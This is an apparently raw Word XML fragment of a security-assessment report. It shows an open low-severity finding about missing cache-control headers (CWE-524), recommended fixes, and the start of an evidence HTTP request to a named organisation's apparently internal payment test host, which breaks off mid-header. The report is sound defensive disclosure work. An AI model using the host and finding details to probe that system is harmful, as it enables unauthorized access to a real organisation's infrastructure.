                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7EFB5F9F" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRPr="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00D4024A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="165439AA" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3834DAF7" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="30765A97" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="228B22"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EC11603" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="19" w:name="_Toc10703679"/>
            <w:r>
              <w:t>L6</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Missing Safeguard:  Cache Controls Not Set</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="19"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="4E7E1CA0" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="477E231B"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CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D158AE4" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="0098400D" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId40" w:anchor="CVSS:3.0/AV:P/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N" w:history="1">
              <w:r w:rsidR="00983E25" w:rsidRPr="00D23AD3">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>1.9</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="15D899C6" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="571D111F"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1126BACA" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-524: Information Exposure Through Caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="438A2A3F" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="318FF1DC"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Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A3E4FD9" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00D23AD3" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Systemic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="4E7F205B" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="26839AD0"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="21D6F4EE" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="7FB24798" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E093159"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Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41B731EC" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Applications should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts.   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C02F7B0" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08E4E352" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cache-control: no-store </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FF18619" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pragma: no-cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="3E46AFFB" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="75717C3D"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lastRenderedPageBreak/>
              <w:t>Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1DB83144" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="5EC3DDF9" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38DA0574" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The below HTTP request and response </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>demonstrates</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> that the application is not setting the cache controls h</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB64A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eader</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F1001BE" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB64A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w14:paraId="007CB7DE" w14:textId="77777777" w:rsidTr="00280358">
              <w:trPr>
                <w:trHeight w:val="1915"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="441F9E41" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>GET /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>sgofundhip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/index.html</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0C07015A" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="03CB9617" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3449B344" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Accept: text/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>html,application</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>xhtml+xml,application</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>xml;q</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>=0.9,*/*;q=0.8</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0A6F196A" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Accept-Language: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>en-US,en;q</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>=0.5</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="632EA596" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Accept-Encoding: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>gzip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>, deflate</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0F936089" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Referer</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: https://payment.sit2.va.anthem.com/gofundhip/</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="23EB109C" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Cookie: </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
